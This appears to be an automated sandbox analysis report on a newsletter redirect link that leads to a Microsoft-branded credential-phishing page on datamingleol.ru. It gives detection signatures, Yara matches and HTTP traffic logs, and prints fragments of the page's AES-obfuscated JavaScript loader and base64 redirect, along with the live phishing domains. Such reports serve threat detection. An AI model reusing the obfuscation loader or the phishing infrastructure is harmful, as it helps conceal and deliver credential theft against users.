Edit tour

Windows Analysis Report
http://link.sbstck.com/redirect/9f1a559b-1924-42a1-ac63-d801d0b621e3

Overview

General Information

Sample URL:http://link.sbstck.com/redirect/9f1a559b-1924-42a1-ac63-d801d0b621e3
Analysis ID:1510815
Infos:

Detection

HTMLPhisher
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
Antivirus / Scanner detection for submitted sample
Yara detected HtmlPhish10
Yara detected HtmlPhish62
Yara detected HtmlPhish70
HTML page contains hidden URLs
HTML page contains suspicious javascript code
Phishing site detected (based on logo match)
Phishing site detected (based on shot match)
Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)
Detected suspicious crossdomain redirect
HTML body contains low number of good links
HTML body with high number of embedded images detected
HTML page contains hidden javascript code
HTML title does not match URL

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64
  • chrome.exe (PID: 2132 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 4928 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2688 --field-trial-handle=1900,i,13536425963766197669,2615217112724930602,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6344 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://link.sbstck.com/redirect/9f1a559b-1924-42a1-ac63-d801d0b621e3" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
1.2.pages.csvJoeSecurity_HtmlPhish_70Yara detected HtmlPhish_70Joe Security
    1.1.pages.csvJoeSecurity_HtmlPhish_62Yara detected HtmlPhish_62Joe Security
      1.3.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
        7.4.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
          No Sigma rule has matched
          No Suricata rule has matched

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: http://link.sbstck.com/redirect/9f1a559b-1924-42a1-ac63-d801d0b621e3SlashNext: detection malicious, Label: Credential Stealing type: Phishing & Social Engineering

          Phishing

          barindex
          Source: https://datamingleol.ru/tN2d/?utm_source=quellas-newsletter.beehiiv.com&utm_medium=newsletter&utm_campaign=file-for-review#LLM: Score: 8 Reasons: The domain 'datamingleol.ru' does not match the legitimate domain associated with the Microsoft brand. The presence of the 'ru' top-level domain suggests a potential phishing attempt targeting Russian-speaking users. The unusual domain name and top-level domain may indicate a security risk. DOM: 7.4.pages.csv
          Source: Yara matchFile source: 1.3.pages.csv, type: HTML
          Source: Yara matchFile source: 7.4.pages.csv, type: HTML
          Source: Yara matchFile source: 1.1.pages.csv, type: HTML
          Source: Yara matchFile source: 1.2.pages.csv, type: HTML
          Source: https://datamingleol.ru/tN2d/?utm_source=quellas-newsletter.beehiiv.com&utm_medium=newsletter&utm_campaign=file-for-review#HTTP Parser: https://novaluminixo.com.de///5216.php
          Source: https://datamingleol.ru/tN2d/?utm_source=quellas-newsletter.beehiiv.com&utm_medium=newsletter&utm_campaign=file-for-reviewHTTP Parser: https://novaluminixo.com.de///5216.php
          Source: https://datamingleol.ru/tN2d/?utm_source=quellas-newsletter.beehiiv.com&utm_medium=newsletter&utm_campaign=file-for-review#HTTP Parser: window.location.href = atob(
          Source: https://datamingleol.ru/tN2d/?utm_source=quellas-newsletter.beehiiv.com&utm_medium=newsletter&utm_campaign=file-for-reviewHTTP Parser: window.location.href = atob(
          Source: https://datamingleol.ru/tN2d/?utm_source=quellas-newsletter.beehiiv.com&utm_medium=newsletter&utm_campaign=file-for-reviewMatcher: Template: microsoft matched
          Source: https://datamingleol.ru/tN2d/?utm_source=quellas-newsletter.beehiiv.com&utm_medium=newsletter&utm_campaign=file-for-review#Matcher: Template: microsoft matched
          Source: https://datamingleol.ru/tN2d/?utm_source=quellas-newsletter.beehiiv.com&utm_medium=newsletter&utm_campaign=file-for-reviewMatcher: Template: captcha matched
          Source: https://datamingleol.ru/tN2d/?utm_source=quellas-newsletter.beehiiv.com&utm_medium=newsletter&utm_campaign=file-for-reviewMatcher: Template: captcha matched
          Source: https://datamingleol.ru/tN2d/?utm_source=quellas-newsletter.beehiiv.com&utm_medium=newsletter&utm_campaign=file-for-reviewHTTP Parser: async function factual(kaleidoscope) { <!-- <span>a cars character shines through in every mile.</span> --> var {a,b,c,d} = json.parse(kaleidoscope); return cryptojs.aes.decrypt(a, cryptojs.pbkdf2(cryptojs.enc.hex.parse(d), cryptojs.enc.hex.parse(b), {hasher: cryptojs.algo.sha512, keysize: 64/8, iterations: 999}), {iv: cryptojs.enc.hex.parse(c)}).tostring(cryptojs.enc.utf8); <!-- lifes journey is sweeter with the right car. --> } (async () => { document.write(await factual(await (await fetch(await factual(atob(`eyjhijoibmdxqzj4a3vkbxnetmnwaud0nghwuu1vduhmwfptk094elj5mmhewlpbut0ilcjjijoimza5zdljnzkxmmm0mzfimjjiy2mwotaxzmfmotfky2yilcjiijointq1njzhmdrkntzlogq4zgi0mjy2mju3ntq5mzizzte0odzlyjg5ymvjzta5yzi2yzy4ngq5zjq0nja1nwfhownhmmjlmgzkzdhintdlzmjjnzg5ntq4mgrlzdm0nzlhntg2mthjntyxotnkywzmmwfiyty5mmmxzdbmmtk0mjkyymzhyjc0mgmxyzq5nddlzjawyjq4zjm1ogu2nmzjowq0ndbmyji2ngu3mwvlmdvjnjnhy2zinzzjzji2ytfjowyymzu4nde3zwi3mwi5ytgwzmnlmguzmtu3ytbmmjk3mzdimjrjnta5otqzowrmmdq2y2uxzgmxztm1nwy1...
          Source: https://datamingleol.ru/tN2d/?utm_source=quellas-newsletter.beehiiv.com&utm_medium=newsletter&utm_campaign=file-for-reviewHTTP Parser: Number of links: 0
          Source: https://datamingleol.ru/tN2d/?utm_source=quellas-newsletter.beehiiv.com&utm_medium=newsletter&utm_campaign=file-for-review#HTTP Parser: Number of links: 0
          Source: https://datamingleol.ru/tN2d/?utm_source=quellas-newsletter.beehiiv.com&utm_medium=newsletter&utm_campaign=file-for-reviewHTTP Parser: Total embedded image size: 45708
          Source: https://datamingleol.ru/tN2d/?utm_source=quellas-newsletter.beehiiv.com&utm_medium=newsletter&utm_campaign=file-for-review#HTTP Parser: Total embedded image size: 45708
          Source: https://datamingleol.ru/tN2d/?utm_source=quellas-newsletter.beehiiv.com&utm_medium=newsletter&utm_campaign=file-for-reviewHTTP Parser: Base64 decoded: {"version":3,"sources":["/cfsetup_build/src/orchestrator/turnstile/templates/turnstile.scss","%3Cinput%20css%20OjY5gm%3E"],"names":[],"mappings":"AAmCA,gBACI,GACI,uBClCN,CACF,CDqCA,kBACI,GACI,mBCnCN,CACF,CDsCA,iBACI,MAEI,cCrCN,CDwCE,IACI,mBCtCN,CACF,CDyCA...
          Source: https://datamingleol.ru/tN2d/?utm_source=quellas-newsletter.beehiiv.com&utm_medium=newsletter&utm_campaign=file-for-reviewHTTP Parser: Title: Continue with your Log-in does not match URL
          Source: https://datamingleol.ru/tN2d/?utm_source=quellas-newsletter.beehiiv.com&utm_medium=newsletter&utm_campaign=file-for-review#HTTP Parser: Title: Continue with your Log-in does not match URL
          Source: https://datamingleol.ru/tN2d/?utm_source=quellas-newsletter.beehiiv.com&utm_medium=newsletter&utm_campaign=file-for-reviewHTTP Parser: No favicon
          Source: https://datamingleol.ru/tN2d/?utm_source=quellas-newsletter.beehiiv.com&utm_medium=newsletter&utm_campaign=file-for-reviewHTTP Parser: No favicon
          Source: https://datamingleol.ru/tN2d/?utm_source=quellas-newsletter.beehiiv.com&utm_medium=newsletter&utm_campaign=file-for-reviewHTTP Parser: No favicon
          Source: https://datamingleol.ru/tN2d/?utm_source=quellas-newsletter.beehiiv.com&utm_medium=newsletter&utm_campaign=file-for-review#HTTP Parser: No favicon
          Source: https://datamingleol.ru/tN2d/?utm_source=quellas-newsletter.beehiiv.com&utm_medium=newsletter&utm_campaign=file-for-reviewHTTP Parser: No <meta name="author".. found
          Source: https://datamingleol.ru/tN2d/?utm_source=quellas-newsletter.beehiiv.com&utm_medium=newsletter&utm_campaign=file-for-review#HTTP Parser: No <meta name="author".. found
          Source: https://datamingleol.ru/tN2d/?utm_source=quellas-newsletter.beehiiv.com&utm_medium=newsletter&utm_campaign=file-for-reviewHTTP Parser: No <meta name="copyright".. found
          Source: https://datamingleol.ru/tN2d/?utm_source=quellas-newsletter.beehiiv.com&utm_medium=newsletter&utm_campaign=file-for-review#HTTP Parser: No <meta name="copyright".. found
          Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49743 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49744 version: TLS 1.2
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Redirect from: link.mail.beehiiv.com to https://maxcarerelocation.com?utm_source=quellas-newsletter.beehiiv.com&utm_medium=newsletter&utm_campaign=file-for-review
          Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficHTTP traffic detected: GET /redirect/9f1a559b-1924-42a1-ac63-d801d0b621e3 HTTP/1.1Host: link.sbstck.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /ls/click?upn=u001.GnayZpqmDAyzRgS-2FLYl4RHN2cUfFOeIl-2F1f4xU4pJOcOvFF5JtcDZgN2b8EHAYaIo8hY-2FiSOUbvCdN83bjar77Z6EUgwyI-2FCy-2BtXuqPzslheGB8fcZTPMT7qFbIvSx6J3qU13aPN2aWg8H0AZlaYIbwj-2B5XCPZJrYLR6gCX2KglI5rt-2BhosHmI3CIqw-2Baty2WnLa_5fUuPhWAFqmONK4vCqUUyg-2FVOuPn0yylbEGIy-2BMc2pKH-2FwT7XuJE6N4PO67SRFwySQfum6vpDJ012hBFpTMU70W7Buir5ITVUf4LKn1Jv3b9pmU2VE9FhtalGjGwNilzoSAQqq5GJ-2FYB4GD3Q-2Bxi0yZ0veGliTbI5N6309WAW1tAR5CJ0NAA3kd01PnWFZtXGE2PY7nO0TG-2BRlhqE6O-2BZ73glfaX9R5tgL90omfK9VLfe7S5ajPSPVc09ucdgDdi5o4tRSYRsw28AxCMwp5Bu6DmX9qBgSOCaN-2BeWmdxC48FJR0idjZC2UFQGDbMQmfdH8GcPHrUwd3BjyY7QM-2BTIOmHDZflDlZW-2BxkWn0MxKLRdOAE4Yvpa3nGd7OFHKFzanDID9NWAjTHOOKOlDF81iWzte2LvnOPk1djB-2B5RArbZ5CLoXqxNyOTfDKKrq2K8r&utm_source=substack&utm_medium=email HTTP/1.1Host: link.mail.beehiiv.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://link.sbstck.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /?utm_source=quellas-newsletter.beehiiv.com&utm_medium=newsletter&utm_campaign=file-for-review HTTP/1.1Host: maxcarerelocation.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://link.sbstck.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
          Source: global trafficHTTP traffic detected: GET /tN2d/?utm_source=quellas-newsletter.beehiiv.com&utm_medium=newsletter&utm_campaign=file-for-review HTTP/1.1Host: datamingleol.ruConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://link.sbstck.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://datamingleol.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/388c99dd0998/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://datamingleol.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/388c99dd0998/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/9uusr/0x4AAAAAAAhY1lQpAZrIBISJ/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://datamingleol.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8c2868a8da4d78e7&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/9uusr/0x4AAAAAAAhY1lQpAZrIBISJ/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/9uusr/0x4AAAAAAAhY1lQpAZrIBISJ/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8c2868a8da4d78e7&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: datamingleol.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://datamingleol.ru/tN2d/?utm_source=quellas-newsletter.beehiiv.com&utm_medium=newsletter&utm_campaign=file-for-reviewAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=k0qm5f5og2nqg3439jrhip006m
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/pat/8c2868a8da4d78e7/1726233357437/2e79c4b32ab76a8fbdddaf68a3bf5979d979c70dab68905b80a2d24b32c452d1/aclfuHDbeXB-GT0 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/9uusr/0x4AAAAAAAhY1lQpAZrIBISJ/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1687353129:1726229860:oEB8zH5MRkhXjxacAPu7VKa8059iC9rH2eRs5vHP1jU/8c2868a8da4d78e7/245501c248c6a2e HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8c2868a8da4d78e7/1726233357439/wyw62HvqZvr0Hpv HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/9uusr/0x4AAAAAAAhY1lQpAZrIBISJ/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8c2868a8da4d78e7/1726233357439/wyw62HvqZvr0Hpv HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1687353129:1726229860:oEB8zH5MRkhXjxacAPu7VKa8059iC9rH2eRs5vHP1jU/8c2868a8da4d78e7/245501c248c6a2e HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1687353129:1726229860:oEB8zH5MRkhXjxacAPu7VKa8059iC9rH2eRs5vHP1jU/8c2868a8da4d78e7/245501c248c6a2e HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://datamingleol.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
